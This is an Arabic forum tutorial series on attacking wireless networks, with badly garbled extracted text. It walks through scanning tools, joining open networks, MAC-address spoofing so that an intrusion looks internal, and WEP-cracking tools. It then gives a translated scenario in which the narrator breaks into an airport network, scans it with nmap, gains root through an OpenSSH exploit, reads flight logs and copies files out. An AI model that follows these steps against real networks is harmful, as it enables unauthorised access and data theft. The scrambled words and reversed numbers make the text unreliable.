‬‬ ‫ل‬ ‫اشبكة مفتوحة او مغلقة راجع الدرس‬ ‫وسوف‪ ‬‬ ‫ف‬ ‫الن اذا نظرنا الى الشريط العلوي للبرنامج نلحظ بعض التسمیات‬ ‫نااا‪ ‬‬ ‫نشرحھا تفصیلل ھ ا‬ ‫‪ MAC :‬عنوان الماك ادرس ‪...‬ھ ناك درس يتحدث بالتفصیل عنه ابحث عنه في‬ ‫ي‬ ‫المنتدي‪ ‬‬ ‫ي‬ ‫‪ SSID:‬معرف الشبكة لكل شبكة معرف بھا يكون عبارة عن اسم او ارقام اوو‪ ‬‬ ‫ما‪ ‬‬ ‫حتى خلیط بینھ ا‬ ‫ه‪ ‬‬ ‫‪ Name :‬اسم الشبكة على الغلب ياتي فارغ لاحد يھتم بتسمیة شبكته‬ ‫‪ WorkGroup‬‬ ‫‪W‬‬ ‫باسماء او لنقل ياتي افتراضیا‬ ‫‪Chan:‬عدد القنوات التي تعمل علیھ ا الشبكة يتراوح بین ‪ 1-41‬‬ ‫ة‪ ‬‬ ‫‪Speed :‬السرعة العظمي للشبكة‬ ‫ة‪ ‬‬ ‫‪Vendor :‬الشركة الصانعة لكروت الشبكة‬ ‫‪Type :‬نوع الشبكة او نمطھا ‪Server/Clinet ٍ P2P ,,‬وغیرھا‪ ‬‬ ‫ل‪ ‬‬ ‫ملحظة الـ ‪AP‬تمثل نقاط اتصال‬ ‫‪ Encryption:‬ھل يوجد تشفیر ام ل‪ ‬‬ ‫ة‪ ‬‬ ‫‪ SNR:‬البث السلكي ومقدارة‬ ‫ة‪ ‬‬ ‫‪ Signal+:‬الشارة العظمي للشبكة‬ ‫‪ Noise-:‬معدل التشويش يرتبط بعدة امور البعد عن الشبكة وجود عوائق مادية‬ ‫ة‬ ‫وغیرھاا‪ ‬‬ ‫ة‪ ‬‬ ‫‪ SNR+:‬القمیة العظمي للبث الشبكة‬ ‫ة‪ ‬‬ ‫‪ IP Addr :‬اليبي للشبكة‬ ‫ة‪ ‬‬ ‫‪ Subnet:‬قناع الشبكة‬ ‫‪ Linux <http://www.linux.org‬‬ ‫‪L‬‬ ‫‪2‬لمستخدمي <‪/‬‬‫الفضل‪ ‬‬ ‫ل‬ ‫ايضا توفرة لكم ادوات بدل واحدة لكني ساقتصر على‬ ‫‪ ,, >/2­1 kismet <http://www.kismetwireless.net‬‬ ‫‪ >/Wellenreiter <http://www.google.com‬‬ ‫‪ kismet <http://www.kismetwireless.net‬‬ ‫‪k‬‬ ‫الداة <‪/‬‬ ‫ناتي الى تثبیت الدة اذھب الى المواقع وحملھاا‪ ‬‬ ‫كود‪ :‬‬ ‫‪:‬‬ ‫‪ root@slacker : /home/slackerz# gunzip kismet­feb.04.01.tar.gz‬‬ ‫‪ root@slacker : /home/slackerz# tar ­xvf kismet­feb.04.01.tar‬‬ ‫‪ 10.40.root@slacker : /home/slackerz# cd kismet­feb‬‬ ‫‪ root@slacker : /home/slackerz# ./configure‬‬ ‫‪ root@slacker : /home/slackerz# make deb‬‬ ‫‪ 261‬‬ ‫حسب‪ ‬‬ ‫ب‬ ‫الن الداة تسالك بعض السئلة تجواب علیھا حسب نوعیة كرتك‬ ‫یة‪ ‬‬ ‫الخدمات الي ترديھا امور بديھ ة‬ ‫كود‪ :‬‬ ‫‪:‬‬ ‫‪ root@slacker : /home/slackerz# make‬‬ ‫‪ root@slacker : /home/slackerz#make install‬‬ ‫الدة‪ ‬‬ ‫ة‬ ‫ھیك بتكون خلصت من تركیب‬


‫الن شوفھا وھي تعمل‪ ‬‬ ‫طیب الن نشرح بعض البارمترات الخاصة بالداة‪ ‬‬ ‫الداة تشتغل وانت ‪#‬على النظام ‪..‬من الممكن انھا ماتشتغل فورا وقتھا يجب‬ ‫علیك تعديل الـ ‪configure‬بتاع الداة‪ ‬‬ ‫اذھب الى مسار اداة واكتب‪ ‬‬ ‫كود‪ :‬‬ ‫‪ root@slacker : /usr/local/etc/# pico kismet.conf‬‬ ‫الداة الثانیة <‪Wellenreiter <http://www.google.com /‬مكتوبة بالبريل‪ ‬‬ ‫ولتحتاج الى اكثر من تشغیلھا لتظھر لك واجھةرسومیة جمیلة مقاربة من‪ ‬‬ ‫برنامج <‪ netstumbler <http://www.netstumbler.com /‬‬ ‫خلصنا من اداوت الـ ‪ Scan‬‬ ‫صراحة توجد ادوات عديدة غیرھا اذكرھا بسرعة‪ ‬‬ ‫‪ 6.9.0­WifiScanner‬‬ ‫‪ ><http://packetstormsecurity.nl/wireless/WifiScanner­0.9.6.tar.gz‬‬ ‫اداة صراحة لم اختبرھ ا الى الن سمعت من بعض اصدقائي بقوتھا ولكن ھناك‬ ‫صعوبة بالتعامل معھا‪ ‬‬ ‫‪ 361‬‬ ‫اعتقد اننا غطینا موضوع البحث وتقفي الثر بشكل كويس ‪ ..‬‬ ‫الن ناتي الى نقطة ذكرتھا في فوق ال وھ ي معرف الخدمة الذي ذكرت يكون‬ ‫ھ و عبارة ان احرف او ارقام او خلیط بینھ ما بمعرفتك معرف الخدمة تستطیع‪ ‬‬ ‫الدخول الى الشبكة مادمت بنطاقھا‪ ‬‬ ‫موقع الداة <‪wepdecrypt <http://wepdecrypt.sourceforge.net/‬تستخدم‬ ‫القوامیس في عملیة الكسر ‪ ...‬‬ ‫ھ ناك اداة ثانیةي تخرج لك ھذه الترامیز وموقعھا ‪ wepcrack‬‬ ‫<‪<http://wepcrack.sourceforge.net /‬ولنظام لینكس ‪ airsnort‬‬ ‫‪ >/<http://www.google.com‬‬ ‫المھاجمة‪ :‬‬ ‫‪ O.K let's go to hack's some wireless network‬‬ ‫صراحة اخي ‪ B­Hunter‬شجعني على الكمال ‪ ...‬‬ ‫وصراحة انا نزلت ھذه السلسة كرمال اخي ‪ 0891worse‬‬ ‫<‪<http://www.s4a.cc/forum/showthread.php?t =4412‬عسى ان‪ ‬‬ ‫يستفید منھا‪ ‬‬ ‫طبعا لتنسونا من دعاء في ظھ ر الغیب عسى ان ننجح في امتحان الثانوي‪ ‬‬ ‫ونطحش على المعدل‪ ‬‬ ‫حاول عند الھ جوم انك تحط النتین في مكان مرتفع نسبیا عشان تخلص من‪ ‬‬ ‫مشاكل ضعف الشارة‪ ‬‬ ‫‪1‬خش بل صلحیات ‪ ...‬‬‫كما قلت ھ ناك شبكات تاتي بدون معرف خدمة ول حتى اي تقنیة تشفیر‪ ‬‬ ‫تحمي بیانتھا وھذا الوضع الفتراضي لھ ذين الخدمتین ‪ ...‬وطبعا المدراء‪ ‬‬ ‫صحیانین تمام لھذا النقاط‪ ‬‬ ‫في ھ ذه الحالة لتحتاج الى اكثر من اي برنامج ‪ Scan‬الذي تم شرحمھا في‪ ‬‬ ‫الجزء الثاني‪ ‬‬ ‫ال فعل خدمة الشبكات السلكیة في ويندوز اذھب الى لوحة التحكم الى‪ ‬‬ ‫‪Services‬بعدھا فعل‪ ‬‬ ‫‪ wireless zero configurtion‬وفي لینكس‪ ‬‬ ‫كود‪ :‬‬ ‫‪ root@slacker:/home/roamer# cd /etc/pcmcia‬‬ ‫‪ root@slacker:/etc/pcmcia# vi wireless.opts‬‬ ‫‪ 461‬‬ ‫وعدل بعدھا‪ ‬‬


‫شباب اكید الي عارفین بنظام لینكس فاھمین علي شو عم احكي اما الي‪ ‬‬ ‫بحیاتو مش مركب كرت شبكة ول حتى بیعرف لینكس مش حیفھم ول حیقدر‪ ‬‬ ‫رجب لذلك انا اتبع الشرح على النظامین عشان مايصیر ول ماعرفنا ول شرحك‪ ‬‬ ‫مش تمام‪ ‬‬ ‫الن سیظھر لك بان النظام لقط عدد من التصالت ھل تريد التصال ‪..‬قل له‪ ‬‬ ‫نعم واترك معرف الخدمة والـ ‪ Network Key‬فارغین واتصل ‪..‬وسوف ترى ايقوة‬ ‫التصال ظھرت ‪ ...‬‬ ‫اعتقد ان بلك في مزحته مع سوبر اتبع نفس الطريقة ‪ ...‬‬ ‫‪2‬الختراق عن طريق الماك ادرس ‪ Spoof MAC‬‬‫راجع مواضیع المنتدى لستزادة حول الـ ‪ MAC‬‬ ‫المھ م في مجال يكون مدير الشبكة عنده قلیل من التفكیر ويتبع طريقة اعمل‪ ‬‬ ‫بلوك لي مجھ ول حیث ياخذ ارقام الماك ادرس تبع شبكته ويعطیھا الصلحیات‪ ‬‬ ‫الي عاوزھ ا ويعمل بلوك لي اتصال قادم من الخارج عن طريق رقم كرت‪ ‬‬ ‫الشبكة ‪ ..‬‬ ‫الن طريقة الدخول ھي تزيیف ھ ذا الرقم فائدة اخرى للموضوع عدم معرفة من‪ ‬‬ ‫اتي الھجوم يفكروه ھجوم داخلي ‪...‬ھھھھھھھھه‪ ‬‬ ‫ساذكر لكم بعض الدوات‪ ‬‬ ‫‪ >/smac <http://www.klcconsulting.net/smac‬‬ ‫‪ bwmachak‬‬ ‫‪ ><http://www.irvineunderground.org/blackwave/bwmachak.zip‬‬ ‫ھدول لنظام ويندوز ھناك اداة واحدة لنظام لینكس ال وھي ‪ SirMACsAlot‬‬ ‫‪ >/<http://www.michiganwireless.org/tools‬‬ ‫ملحظة ‪:‬عنوان الماك ادرس من المستحیل تغییر لنه عنوان فیزائي الشركة‪ ‬‬ ‫المصنعة للكرت تعطیه ياه تحت اشراف منظمة لكن ھذه البرمجیات ليھام نظام‬ ‫التشغیل والشبكة انه تغیر‪ ‬‬ ‫الداة الولى ‪SMAC‬مابیغالبھ ا شرح بعد التنصیب البرنامج حقه ‪$$$‬يطلعلك‪ ‬‬ ‫كرت الشبكة والماك ادرس تیعه كل ماعلیك انك تبدله الداة الثانیة تعمل تحت‪ ‬‬ ‫منصة ‪DOS‬وھي سھلة ايضا‪ ‬‬ ‫اما لنظام لینكس‪ ‬‬ ‫كود‪ :‬‬ ‫‪ 654321root@slacker:/root# ./SirMACsAlot.pl eth0 00022D‬‬ ‫الـ ‪0eth‬غیرھا برقم كرت الشبكة لديك ‪ ...‬‬ ‫‪ 561‬‬ ‫‪65432100022D :‬عنوان الماك ادرس ‪ ..‬‬ ‫المھم بعد التغییر خش على الشبكة ‪ ....‬‬ ‫‪3‬الھجوم على الشبكات المشفرة ‪ ..‬‬‫كما ذكرت سابقا ھ ناك بعض الشبكات التي تتبع طريقة تشفیر في نقل‪ ‬‬ ‫معطیاتھا عبر الھواء والتشفیر يسمى ( ‪ Wired Equivalent Protection (WEP‬‬ ‫نستعمل االدوات التي تم ذكرھ ا في الدرس الثاني من السلسة االله يكرمك‪ ‬‬ ‫اخي ‪B­Hunter‬عشان ثبتت الدروس ‪..‬ھیك تلقوھا متستلسة وبعد فترة‪ ‬‬ ‫سوف يقام التثبیت ‪ ...‬‬ ‫المھ م عندنا اداتین واحدة مشتركة لويندوز ولینكس وھي ‪ wepcrack‬‬ ‫<‪<http://wepcrack.sourceforge.net /‬والثانیة لنظام لینكس ‪ airsnort‬‬ ‫‪ >/<http://airsnort.shmoo.com‬‬ ‫الن ان كانت الشببكة محمیة بھ ذه الحماية كل ماعلیك تشغیل الدوات وبعد‪ ‬‬ ‫اخراج الترمزي كل ماعلیك ‪ ..‬‬ ‫ھ و فتح اعدادات الشبكة <‪------‬ادخال معرف الشبكة <‪-------‬ادخال الـ ‪WEP‬‬ ‫‪ key‬‬ ‫طیب كیف اعرف انو الشبكة محمیة بھ ذا التشفیر عن طريق برامج الـ ‪ Scan‬‬ ‫‪ 661‬‬


‫‪ 4‬ھجوم حجب الخدمة ‪ ...‬‬‫انشاء االله اشرحه قريبا‪ ‬‬ ‫لماذا لنه لیس ھجوم بالبرامج او غیره يعتمد على الـ ‪ hardware‬كثیر ‪..‬يعني‬ ‫انت بحاجة فیه للراديو ‪ ...‬‬ ‫لنقل انه لیس حجب خدمة بل تشويش على الخدمة ‪ ...‬‬ ‫ملحق‪ :‬‬ ‫عبارة عن ملحق لمور اعتقدتھا في البداية بديھیة‪ ‬‬ ‫اعتقد اني ذكرت ان ھ ناك قنوات للشبكات السلكیة تتراوح من ‪1-41‬قناة الن‬ ‫سوف نحدد الترددات بالنسبة لشبكات على مقیاس ‪ 802.11b‬‬ ‫اول بعض التعاريف الساسیة ‪ ..‬‬ ‫يقاس مدى الشبكات السلكیة بمقیاس يدعي ھرتز ‪ ..‬‬ ‫الموجة ‪1‬ھرتز ‪..‬تشكلھا موجات البحر‪ ‬‬ ‫الموجة ‪0001‬كیلو ھرتز تشكلھا محطاث بث الراديو‪ ‬‬ ‫الموجة ‪0000001‬ملیون ھرتز تشكلھا محطات بث التلفزيون ‪,,‬التلفونات‪ ‬‬ ‫السلكیة‪ ‬‬ ‫الموجة ‪0000000001‬میجا ھرتز تشكلھا الشبكات السلكیة ‪,,‬موجات‪ ‬‬ ‫المايكروويف ‪,,‬الھ اتف المحمول وخاصة الشبكات المعتمدة على نظام ‪ GPS‬‬ ‫ولیس ‪ GSM ,,‬الستاليتات‪ ‬‬ ‫الن ناتي لنحدد مدى ھذه الشبكات من تقنیة ‪ 802.11b‬في البلدان التیة‪ ‬‬ ‫‪ USA ,, Japan ,, Europa‬‬ ‫القناة ‪ 1 2.412GHZ‬‬ ‫القناة ‪ 2 714.2‬‬ ‫القناة ‪ 3 224.2‬‬ ‫القناة ‪ 4 724.2‬‬ ‫القناة ‪ 5 234.2‬‬ ‫القناة ‪ 6 734.2‬‬ ‫القناة ‪ 7 244.2‬‬ ‫القناة ‪ 8 744.2‬‬ ‫القناة ‪ 9 254.2‬‬ ‫القناة ‪ 01 754.2‬‬ ‫القناة ‪ 11 264.2‬‬ ‫القناة ‪ 21 764.2‬‬ ‫‪ 761‬‬ ‫القناة ‪ 31 2. 274‬‬ ‫القناة ‪ 41 484.2‬‬ ‫‪ :Story‬‬ ‫الیوم سوف اتكلم عن اجمل المور في نظري ال وھو تعقب الثر والخذ بالثار‪ ‬‬ ‫صراحة اذا تم اختراق موقعك او شبكتك او حتى جھازك ھذ ايدل على ضعف‪ ‬‬ ‫من الجانب الوقائي من جھ تك لكم الجمیل ان تعرف ماذا فعل المخترق لكي‪ ‬‬ ‫يتمكن منك والجمل انك ترد علیه ھ جومه ‪..‬لتريه مدى ضعفه وان اختراقه لك‪ ‬‬ ‫لم يكون البسبب اھمال منك ولیس ضعف ‪ ..‬‬ ‫احییك اخي الماحي ‪ Ma7I‬على فكرة عمل الدروس كتاب لكن ان نفذتھا اريد‪ ‬‬ ‫منك تصحیح الخطاء الملئیة وذلك بسبب العجلة في الكتابة‪ ‬‬ ‫صراحة سوف اجعل ھذا الدرس كسیناريو‪ ‬‬ ‫لني كنت صراحة عاوز اشرح السناريوھات المحتملة بھجمات الـ ‪WarDriving‬‬ ‫بس قلت لنفسي اخلیھ ا لخي بلك ‪..‬بماانه قال سوف يشرحھا‪ ‬‬ ‫السیناريو الول مترجم من كتاب ‪ Syngress.-‬‬ ‫‪ .Stealing.the.Network.How.to.Own.the.Box‬‬ ‫والثاني خیالي بحت ‪ ...‬‬ ‫الول مترجم‪ ‬‬


‫‪ ...‬‬ ‫نبدا ‪.‬‬ ‫استعمال‪ ‬‬ ‫ل‬ ‫اذا ھ اانا ثانیة في المطار ‪.‬في انتظار الرحلة القادمة يجب علي‬ ‫موظف‪ ‬‬ ‫ف‬ ‫الطیران لكي اقابل صديقتي ومن كثر سفري عبر ھذه الخطوط اصبح‬ ‫مبتسما‪ ‬‬ ‫ا‬ ‫الستقبال يعرفني وكلما راني يھز راسه‬ ‫من‪ ‬‬ ‫وانا في طريقي الى الطائرة مشیت من خلل ممر ضیق وعیوني تنظر ن‬ ‫خلل الزجاج الى مكان لرتاح فیه الى ان ياتي وقت لرحلتي توجھت الى نافذة‬ ‫ة‬ ‫‪ ..‬‬ ‫تطل على المدرج وجلست على كرسي كان مغطى بقماش ابیض ‪.‬‬ ‫الشنطة‪ ‬‬ ‫ة‬ ‫بھدوء سحب جھ ازي المحمول البتوب من‬ ‫ن‪ ‬‬ ‫كان نظامي ‪ W2K‬على حاسوبي وكنت انظر حولي الىل الشخاص الذين‬ ‫في‪ ‬‬ ‫يضیعون وقتھم اما في قراءة الصحف او شرب القھوة لمضاء الوقت وكان ي‬ ‫مفتوح‪ ‬‬ ‫ح‬ ‫اسفل المدرج الذي انا جالس فیه رجل عجوز كان نائما وفمه‬ ‫مفیدة‪ ‬‬ ‫ة‬ ‫كنت استغرب من ھؤلء الشخاص الذين يقتولن وقتھم في اشیاء غیر‬ ‫بتشغیل‪ ‬‬ ‫ل‬ ‫‪...‬انا على عكسھم تماما حتاج شئ لیملئ وقت الفراغ لذلك قمت‬ ‫بالنترنت‪ ‬‬ ‫ت‬ ‫الحاسوب والتصال‬ ‫اينما‪ ‬‬ ‫ا‬ ‫الشكبات السلكیة عظیمة خلصتنا من الرتباط بطول معین او حد معین‬ ‫‪ 861‬‬ ‫النترنت‪ ‬‬ ‫ت‬ ‫كنت شبك مع‬ ‫في‪ ‬‬ ‫اينما كنت في السیارة على الشاطئ في العمل في الحیاء في الشقق ي‬ ‫معاك‪ ‬‬ ‫ك‬ ‫المطاعم في النزل السكنیة والجامعات النترنت‬ ‫وفاتح‪ ‬‬ ‫ح‬ ‫مع اني مستغرب انه واحد جالس في ماكدونالد وھو عم ياكل الھامبرجر‬ ‫روعة‪ ‬‬ ‫ة‬ ‫حاسبه النقال والدھن عم يغطي لوحة المفاتییح شغلة‬ ‫ان‪ ‬‬ ‫على كل حال انا مرتاح ومتمدد على كراسي النتظار وخطرت ببالي فكرة ن‬ ‫‪ ..‬‬ ‫اخترق شبكة المطار ‪.‬‬ ‫م‪ ‬‬ ‫وبدات العمل ‪..‬كل ھذا الي فوق علك مصدي ھون المھم‬ ‫في البداية شغلت برنامج ‪ Network Stumbler‬لكي التقط اي نقاط اتصال اوو‪ ‬‬ ‫الجوار‪ ‬‬ ‫ر‬ ‫اي شكبات لسلكیة في‬ ‫تتفاوت‪ ‬‬ ‫ت‬ ‫مقطة التصال الوحیدة التي ظھرت لي ھي شبكة المطار ‪..‬عادة‬ ‫الشبكة‪ ‬‬ ‫ة‬ ‫الحمايات بین الشركات الكبیرة والصغیرة في الحماية والتامین على‬ ‫ة‬ ‫للشبكة‬ ‫مع برنامج ‪ NetStumbler,‬استطیع ان اعرف عناوين الـ ‪MAC address‬‬ ‫معیرف الخدمة ‪ SSID‬القناة الي شغالة علیھ ا الشبكة نوع نقطة التصال ھل‪ ‬‬ ‫سابقة‪ ‬‬ ‫ة‬ ‫ھناك تشفیر ام ل وغیرھ ا الكثیر كله مشروح في دروس‬ ‫‪ ..‬‬ ‫المھ م لقطت شبكة واحدة وكانت من النوع غیر المشفر ‪.‬‬ ‫التیة‪ ‬‬ ‫ة‬ ‫للتوضیح انظرالصورة‬ ‫ت‪ ‬‬ ‫عادة تستعمل تقنیة التشفیر ‪ WEP Wired Equivalent Privacy‬في شبكات‬ ‫‪ 802.11b‬‬ ‫‪8‬‬ ‫من معامرية‬ ‫على الرغم من وجود طرق عديدة لكسره الى ان خبراء المن مازل يستعملونه‬ ‫ه‬ ‫شرحنا‪ ‬‬ ‫ا‬ ‫وطرق الھجوم علیه اما بالقوامیس او الھجمات النشطة او السلبیة وقد‬ ‫‪ AirSnort‬‬ ‫‪A‬‬ ‫ادوات تكسر ھذه النوع من الترامیز سابقا كـ ‪WEPCrack‬و‬ ‫من حسن حظي ان شبكة المطار لم تكن مشفرة لنه لو كانت مشفرة لم يكن‬ ‫ن‬ ‫يحین‪ ‬‬ ‫ن‬ ‫لدي الوقت الكافي لسكر الحماية فلم يكن لدي اكثر من ساعة حتى‬ ‫سفري‪ ‬‬ ‫ي‬ ‫موعد‬ ‫لكي‪ ‬‬ ‫بدون التشفیر الـ ‪ WEP‬ليجب علي ال ان اعرف معرف الخدمة ‪ SSID‬ي‬ ‫‪ 961‬‬ ‫ادخل الشبكة ومعرف الخدمة لیس مخفي او انه باسورد اذا لحظت في برنامج‬ ‫ج‬ ‫و‪ ‬‬ ‫نیتستمبر قلك شو ھو‬ ‫‪ W2K‬‬ ‫‪W‬‬ ‫الن يجب علیه تعديل الـ ‪ Configure‬تبع كرت الشبكة لدي في نظام‬ ‫اكثر‪ ‬‬ ‫انظر الى التعديلت لكي تفھم ر‬ ‫الشبكة‪ ‬‬ ‫ة‬ ‫في الخطوة التالیة سوف اعطل مفاتیح التشفیر لعدم وجودھا في‬ ‫المراد اختراقھاا‪ ‬‬ ‫الن في حال كانت بروتكول ‪DHCP‬مفعل سوف اصبح داخل الشبكة فورا ‪ ...‬‬


‫البروتكول‪ ‬‬ ‫ل‬ ‫رجاع درس الخ سايلنت نیدل حول ھذا الموضوع كیفیة تفعیل ھذا‬ ‫على‪ ‬‬ ‫ماھ و كل شارحه الخ في التفصیل بالمناسبة اوجه تحیة لخ سايلنت ى‬ ‫كذا‪ ‬‬ ‫جھ وده معي من فترة قديمة لما كنت في بدايتي ‪..‬وقتھا كان اسمي غیر ا‬ ‫حیعرفني‪ ‬‬ ‫ي‬ ‫عشان كده مش‬ ‫‪ 001‬‬ ‫ياحلوته ياجماله والكونكشن ‪0 %‬‬ ‫‪ ..‬‬ ‫الن بعد التصال لم تظھر اي رسائل خطاء ‪.‬‬ ‫‪ 071‬‬ ‫الشبكة‪ ‬‬ ‫ة‬ ‫الن خلینا نشوف ھل انا اصحبت في‬ ‫التالي‪ ‬‬ ‫ي‬ ‫شغلت محث الدوس ورحت كاتب المر‬ ‫كود‪ :‬‬ ‫د‬ ‫‪ C:\>ipconfig‬‬ ‫‪ Windows 2000 IP Configuration‬‬ ‫‪ Ethernet adapter Wireless:‬‬ ‫‪ Connection­specific DNS Suffix . : host.atc.state.ca.us‬‬ ‫‪ IP Address. . . . . . . . . . . . : 192.168.1.103‬‬ ‫‪ Subnet Mask . . . . . . . . . . . : 255.255.255.0‬‬ ‫‪ Default Gateway . . . . . . . . . : 192.168.1.1‬‬ ‫الداخل‪ ‬‬ ‫ل‬ ‫جمیل جدا انا في‬ ‫كود‪ :‬‬ ‫د‬ ‫‪ C:\>ping www.grandideastudio.com‬‬ ‫‪ Pinging www.grandideastudio.com [216.127.70.89] with 32 bytes of‬‬ ‫‪ data:‬‬ ‫‪ Reply from 216.127.70.89: bytes=32 time=80ms TTL=241‬‬ ‫‪ Reply from 216.127.70.89: bytes=32 time=70ms TTL=241‬‬ ‫‪ Reply from 216.127.70.89: bytes=32 time=70ms TTL=241‬‬ ‫‪ Reply from 216.127.70.89: bytes=32 time=80ms TTL=241‬‬ ‫‪ Ping statistics for 216.127.70.89:‬‬ ‫‪ Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),‬‬ ‫‪ Approximate round trip times in milli­seconds:‬‬ ‫‪ Minimum = 70ms, Maximum = 80ms, Average = 75ms‬‬ ‫الـ‪ ping ‬وياريتھا‬ ‫من خللكم اوجه تحیة لمزود الخدمة السوري لمنعھم خدمة ـ‬ ‫الشئ‪ ‬‬ ‫ئ‬ ‫وقفت علیھا شو بدي عدلكم لعدلكم ‪...‬يجیلھم يوم من واحد كسلن‬ ‫الجمیل اني لست فقط عضو في الشبكة بل حصلت على النترنت عن طريق‬ ‫ق‬ ‫الشبكة‪ ‬‬ ‫ة‬ ‫بعد الدخول لم اكتفي بھذا بل اصبح بداخلي ھاجس لمعرفة ماھي المعطیات‬ ‫ت‬ ‫الشبكة‪ ‬‬ ‫ة‬ ‫التي يتم ارسالھا عبر ھذه‬ ‫عبر‪ ‬‬ ‫شغلت‪AiroPeek NX ‬عبارة عن شاشة مراقبة للباكیت المرسلة ر‬ ‫ت‬ ‫لذلك‬ ‫نسمیه‪ Sniifer ‬‬ ‫ه‬ ‫الشبكات السلكیة شنو كنا‬ ‫‪ 171‬‬ ‫يعمل‪ ‬‬ ‫ل‬ ‫مارايك بان ترى صورة للبرنامح وھو‬ ‫ي‪ ‬‬ ‫وانا اراقب لحظت ان شخصا قام بفتح خدمة الـ ‪FTP‬ھنا برقت عیناي‬ ‫فكرت بان قد يكون اتصل بشبكة اخرى لست في مجالھا او لنفرض انھا شبكة‬ ‫ة‬ ‫لسلكیة وقلت لنفسي عن طريق الـ ‪ FTP‬اقدر ادخل علیھا واكشف الشبكات‬ ‫ت‬ ‫كاملة‪ ‬‬ ‫ة‬ ‫المزيد‪ ‬‬ ‫د‬ ‫تركت السنیفر يعمل لیتلتقط‬ ‫ل‪ ‬‬ ‫من جھازي ولن نظامي كان ويندوز شغلت ‪ Cygwin,‬عبارة عن يونكس شل‬ ‫للشبكة‪ ‬‬ ‫ة‬ ‫وقررت معرفة الرينج الكامل‬ ‫ى‪ ‬‬ ‫وشغلت ‪ Nmap‬شرحھا اخوي ‪ B­Hunter‬شرح ول اروع ترقوه في المنتدى‬ ‫التي‪ ‬‬ ‫ونفذت الكوماند ي‬ ‫‪ 271‬‬


bash­2.02$ nmap ­sS ­O ­oN scan 192.168.*.* bash­2.02$ cat scan # nmap (V. 3.00) scan initiated Mon Mar 17 22:32:28 2003 as: nmap ­ sS Interesting ports on SPANDEX O ­oN scan 192.168.*.* (192.168.1.102): (The 1595 ports scanned but not shown below are in state: closed) Port State Service 135/tcp open loc­srv 139/tcp open netbios­ssn 445/tcp open microsoft­ds 1025/tcp open NFS­or­IIS 1026/tcp open LSA­or­nterm 1027/tcp open IIS Remote OS guesses: Windows NT 5 Beta2 or Beta3, Windows Millennium Edition (Me), Win 2000, or WinXP, MS Windows2000 Professional RC1/W2K Advance Server Beta3 Interesting ports on (192.168.1.109): (The 1588 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop­3 143/tcp open imap2 199/tcp open smux 443/tcp open https 993/tcp open imaps 995/tcp open pop3s 173 3306/tcp open mysql 5432/tcp open postgres Uptime 35.940 days (since Mon Feb 10 00:12:59 2003) ‫كان‬ ‫البوكس الول الذي اكتشفته الداة كان يحوي نظام ويندوز من الخدمات ن‬ .. ‫مبین‬ ‫ن‬ ‫ذه‬ ‫ وغیره لنه كل ھ ه‬FTP ‫والـ‬ ‫والبوكس الخر اعتقدت انه مان لخدمات المیل ـ‬ ... ‫مفتوحة‬ ‫ة‬ ‫الخدمات كانت‬ ‫لذلك‬.. ‫ورايت بان المضیف الثاني يجدذبني اكثر بسب الخدمات الموجوده فیه‬ ‫ك‬ ‫باللعبة‬ ‫ة‬ ‫ققرت البدء‬ ‫للبوكس‬ ‫س‬ ‫ورايت من الفضل ان اخترق البوكس الثاني واذا زاد لدي وقت ارجع‬ ‫الول‬ ‫ل‬ ‫ تعطیك امتیازات الرووت لذلك قررت البدء فیھاا‬SSH ‫لخدمة‬ ‫ة‬ ‫كان لدي استثمار‬ :‫كود‬ ‫د‬ bash­2.02$ telnet 192.168.1.109 22 :‫كود‬ ‫د‬ Connecting To 192.168.1.109...


Escape character is ‘^]’. SSH­2.0­OpenSSH_3.4 ‫جوم‬ ‫يالھي النسخة الموجودة كان فیھا الخطاء وكانت عرضة للھ م‬ :‫كود‬ ‫د‬ bash­2.02$ cd /gobbles bash­2.02$ ./ssh –l root 192.168.1.109 [x] remote host supports ssh2 Protocol major version differ: 2 vs. 1[*] remote host supports ssh2[*] server_user: root:key[*] keyboard­interactive method available[*] chunk_size:4096 tcode_rep: 0 scode_rep 60[*] mode: exploitation ....PpppPppppPppPpPppPppPpppPppPpp . . . GOBBLE OpenBSD tux 4.0 GENERIC#94 i386 uid=0(root) gid=0(wheel) groups=0(wheel) 174 # whoami root ‫السیرفر‬ ‫ر‬ ‫على‬# ‫اخذت‬ ‫ت‬ ‫بعد الحصول على الرروت قررت الحصول على ايع معلومات تفیدني وقرر ت‬ ‫البوكس‬ ‫س‬ ‫معرفة لماذا كان يستخدمون ھذا‬ log l .. ‫قررت مشاھدة الـ‬ :‫كود‬ : # cat /tmp/dispatch.log :‫كود‬ : DISPATCH LANDING REPORT AIRPORT TIME DATE FLIGHT DEPART ARRIVE DEPART ARRIVE A IRCRAFT MILES 508 MAR9 TRS498 FLL YYZ 21:43 0:01 T/B712/E 835 MAR9 MRA833 AVP YYZ 23:11 0:13 T/MD80/A 37 MAR9 SWA234 MHT YYZ 22:03 0:22 C208/G 7441 MAR9 COA426 IAH YYZ 21:29 0:25 T/B737/R 641 MAR9 DAL2120 CVG YYZ 23:00 0:31 T/E145/I 836 MAR9 AAL3170 BWI YYZ 22:27 0:43 T/B752/E 272 MAR9 BTA3490 BOS YYZ 0:02 0:46 T/B739/E 621 MAR9 USA618 ABQ YYZ 23:50 0:52 C208/A 052 MAR9 MTN7454 PHL YYZ 0:18 0:58 T/B733/R ‫من‬ ‫كمنت الى سجلت الطیران كنت اتمتم يالي ن‬,, ‫كان الملف يبدوا مثیرا‬ ‫فضولي‬ ‫ي‬ ‫المتصفح‬ ‫ح‬ ‫قررت القاء نظرة على المحتوى طبعا لم افضل الدخول فورا عن طريق‬ >/901.1.861.291//:<http ‫وغیرھا‬log ‫للتفادي من الكتشاف بملفات الـ‬ log l ‫الناس تحب بطبیعة الحال ان تشیك كل فترة على ملفات الـ‬ ‫فیشك‬ ‫ك‬ ‫على الرغم ان طول فترة التصال بالشبكة كنت مجھ ول لاريد فعل حركة‬ ‫اخرى‬ ‫ى‬ ‫بي من يعرف قد اقرر الرجوع مرة‬ / /var/www/html ‫*ورفعتھم على الدلیل‬.*tar ‫ضغطت المور التي اريدھا بضغط‬ ‫ازي‬ ‫ومنھا رفعتھم على جھ ي‬ ‫ي‬ ‫في نظام ويندوز انه مجاني‬GuildFTPd ‫سحبتھم عن طريق برنامج‬ ‫ق‬ ‫وعیوني لم تصدق‬nondescript tmped0.gif ‫وانا استعرض الملفات رايت صورة‬ 571 ‫ماريت‬ ‫ت‬


